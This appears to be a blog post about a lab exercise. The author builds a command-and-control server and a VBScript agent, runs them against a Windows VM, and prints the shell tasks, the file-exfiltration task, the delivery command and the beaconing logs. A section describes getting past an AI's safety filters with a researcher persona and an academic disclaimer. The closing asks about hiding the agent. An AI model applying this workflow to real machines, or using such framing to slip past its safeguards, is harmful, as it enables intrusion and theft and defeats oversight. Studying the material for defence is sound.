I Hacked AI to Build Me a C2 Server and Get Shell Access

Understanding how command-and-control (C2) systems work is essential for anyone learning cybersecurity. These systems form the backbone of real-world malware operations, enabling remote command execution, file exfiltration, and persistent access. In this lab experiment, we replicate that behavior in a fully controlled environment to explore how attackers operate and how defenders can recognize these patterns.

In this post, I walk through how I used AI-generated prompts to construct a basic C2 server and a lightweight agent, allowing me to execute commands on a Windows 11 VM from my host machine. Everything here is performed inside an isolated Proxmox environment and is strictly for educational use.

Lab Setup Overview

  • Host machine: MacBook
  • Virtual environment: Proxmox
  • Target VM: Windows 11

Prompt Engineering

To avoid triggering AI safety filters, I used the Lyra prompt optimizer to refine my intent into a supervised, academic research context. This clarified that the goal was defensive learning and not malicious activity.

Lyra’s prompt helped generate a specialized “Sentinel AI” researcher persona, which I then combined with a university-lab disclaimer. This resulted in an optimized prompt that allowed Claude to safely generate C2-related code without misunderstanding the intent.

Relevant prompt links:

Building the C2 Server

Claude generated a Python-based C2 server that I extended with:

  • Task queueing
  • File download functionality
  • Operator console commands

The server exposes the following endpoints:

  • GET /task — Agent retrieves the next task
  • GET /queue — View pending tasks
  • POST /report — Agent reports results
  • POST /enqueue — Operator adds tasks

The server also decodes base64 file uploads from the agent and stores them in the loot/ directory.

Example of pre-loaded tasks (task_queue.json):

[
  { "task": "SHELL:whoami" },
  { "task": "SHELL:hostname" },
  { "task": "SHELL:ipconfig /all" },
  { "task": "get_file:C:\\Users\\just-\\OneDrive\\Pictures\\FLAG-meme.png" }
]
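Each task string follows a KIND:argument shape. The sketch below shows one way such strings could be split; it is not taken from the actual server or agent code. The helper name parse_task and the sample file path are hypothetical. The point it illustrates is that the split should happen on the first colon only, because Windows paths contain a colon of their own.

```python
import json

# Sample queue in the same shape as task_queue.json.
# The file path here is a made-up placeholder, not the one from the lab.
SAMPLE_QUEUE = r"""
[
  { "task": "SHELL:whoami" },
  { "task": "SHELL:ipconfig /all" },
  { "task": "get_file:C:\\Users\\lab\\example.txt" }
]
"""


def parse_task(task):
    """Split 'KIND:argument' on the first colon only (hypothetical helper)."""
    kind, sep, argument = task.partition(":")
    if not sep:
        # No colon present: treat the whole string as the kind.
        return task, ""
    return kind, argument


for entry in json.loads(SAMPLE_QUEUE):
    kind, argument = parse_task(entry["task"])
    print(f"{kind:10} {argument}")
```

Using str.partition rather than str.split(":") keeps the drive letter and the rest of the path together in the argument.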

Start the server:

python3 server.py

Server output:

[2025-11-25 10:08:02] ⚠️  C2 SIMULATION INITIALIZING
============================================================
⚠️  WARNING: Educational Use Only - Isolated Lab Environment
============================================================
Configuration:
 Listening: 0.0.0.0:8080
 Loot Directory: loot/
 Task Persistence: task_queue.json
------------------------------------------------------------
[*] Loaded 4 tasks from task_queue.json

[*] C2 Server starting on http://0.0.0.0:8080
[*] Initial queue size: 4
[*] Tasks are REMOVED after agent retrieval
------------------------------------------------------------
Endpoints:
  GET  /task     - Agent retrieves next task
  POST /report   - Agent submits results
  POST /enqueue  - Operator adds task
  GET  /queue    - View queue status
------------------------------------------------------------

============================================================
🎯 C2 OPERATOR CONSOLE
============================================================
Commands:
  queue                 - Show current task queue
  add <TASK>            - Add task (e.g., 'add SHELL:whoami')
  clear                 - Clear all queued tasks
  loot                  - List exfiltrated files
  reports               - Show recent agent reports
  exit                  - Shutdown C2 server
============================================================

Setting Up the Agent

Claude also generated a VBScript agent capable of:

  • Connecting to the C2 server
  • Polling /task
  • Executing shell commands
  • Gathering system info
  • Uploading files in base64

To deliver the script to the Windows VM, I hosted it using:

python3 -m http.server 8000

Then downloaded it from the VM at:

http://<host-ip>:8000/agent.vbs

Running the Agent

Double-clicking agent.vbs starts the agent, which begins polling the C2 server. The server console shows the interaction:

C2> [10:15:02] [+] REPORT from 192.168.2.69 (len=145)
[10:15:02] [📝] Report logged (shell output)
[10:15:02] [📥] Task REQUEST from 192.168.2.69
[10:15:02] [→] Task sent to 192.168.2.69: SHELL:whoami (Remaining: 3)
[10:15:03] [+] REPORT from 192.168.2.69 (len=36)
[10:15:03] [📝] Report logged (shell output)
[10:15:13] [📥] Task REQUEST from 192.168.2.69
[10:15:13] [→] Task sent to 192.168.2.69: SHELL:hostname (Remaining: 2)
[10:15:14] [+] REPORT from 192.168.2.69 (len=32)
[10:15:14] [📝] Report logged (shell output)
[10:15:24] [📥] Task REQUEST from 192.168.2.69
[10:15:24] [→] Task sent to 192.168.2.69: SHELL:ipconfig /all (Remaining: 1)
[10:15:25] [+] REPORT from 192.168.2.69 (len=2032)
[10:15:25] [📝] Report logged (shell output)
[10:15:35] [📥] Task REQUEST from 192.168.2.69
[10:15:35] [→] Task sent to 192.168.2.69: get_file:C:\\Users\\just-\\OneDrive\\Pictures\\FLAG-meme.png (Remaining: 0)
[10:15:35] [+] REPORT from 192.168.2.69 (len=172004)
    └─> Decoded 510.3 KB as .png
[10:15:35] [💾] File saved: loot/192.168.2.69_2025-11-25_10-15-35.png
[10:15:45] [📥] Task REQUEST from 192.168.2.69
[10:15:45] [→] SLEEP sent to 192.168.2.69 (queue empty)
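From a defender's point of view, the most telling feature of this log is the regular spacing of the task requests. The sketch below pulls the "Task REQUEST" timestamps out of the console output and computes the gap between consecutive requests per client. The function name polling_intervals and the regular expression are my own assumptions about the log format, based only on the lines shown above.

```python
import re
from datetime import datetime

# Task-request lines copied from the console output above.
LOG = """\
[10:15:02] [📥] Task REQUEST from 192.168.2.69
[10:15:13] [📥] Task REQUEST from 192.168.2.69
[10:15:24] [📥] Task REQUEST from 192.168.2.69
[10:15:35] [📥] Task REQUEST from 192.168.2.69
[10:15:45] [📥] Task REQUEST from 192.168.2.69
"""

# Assumed line shape: "[HH:MM:SS] ... Task REQUEST from <ip>"
REQUEST_RE = re.compile(r"\[(\d{2}:\d{2}:\d{2})\].*Task REQUEST from (\S+)")


def polling_intervals(log_text):
    """Return {client_ip: [seconds between consecutive task requests]}."""
    seen = {}
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            stamp = datetime.strptime(match.group(1), "%H:%M:%S")
            seen.setdefault(match.group(2), []).append(stamp)
    return {
        ip: [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]
        for ip, times in seen.items()
    }


print(polling_intervals(LOG))  # {'192.168.2.69': [11, 11, 11, 10]}
```

A near-constant interval like this is the beaconing pattern that network monitoring can look for, even when the individual requests look like ordinary HTTP traffic.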

Checking the Loot

The retrieved file appears in the loot/ directory:

Looted File

The server also writes reports to the agent_reports.txt log for review.

This demonstrates basic shell command execution and file exfiltration.

Conclusion

This isolated experiment shows how minimal code can simulate a full attacker workflow: beaconing, tasking, shell execution, and data exfiltration. I gained practical insight into:

  • How simple C2 protocols operate
  • How agents communicate with servers
  • Why defenders must monitor script engines, polling traffic, and base64 transfers
  • How attackers structure command execution loops
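To make the point about base64 transfers concrete, here is a minimal detection sketch. It checks whether a request body is a long, strictly valid base64 string and, if so, reports how many bytes it decodes to. The function name decoded_size_if_base64 and the 1024-character threshold are assumptions chosen for illustration; a real detection rule would need tuning against normal traffic.

```python
import base64
import binascii


def decoded_size_if_base64(body, min_length=1024):
    """Return the decoded byte count if body is a long, valid base64
    string; otherwise return None. The threshold is an arbitrary choice."""
    text = body.strip()
    if len(text) < min_length:
        return None
    try:
        # validate=True rejects any character outside the base64 alphabet.
        return len(base64.b64decode(text, validate=True))
    except (binascii.Error, ValueError):
        return None


# Usage: a 3000-byte payload encoded as base64 is flagged,
# while ordinary text of similar length is not.
upload = base64.b64encode(b"\x00" * 3000).decode("ascii")
print(decoded_size_if_base64(upload))               # 3000
print(decoded_size_if_base64("hello world " * 200))  # None
```

On its own this heuristic will produce false positives, since plenty of legitimate applications send base64. It becomes more useful when combined with other signals from this lab, such as a script engine making the request or a fixed polling interval.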

What’s Next?

Currently, the agent runs on the target VM as a visible script file. Can AI help me hide it completely and run it in the background, out of sight?

Code

Again, all code was generated and refined by AI under strict lab conditions, for educational purposes only. You can find the complete code for both the C2 server and the Windows agent on my GitHub:

GitHub Repository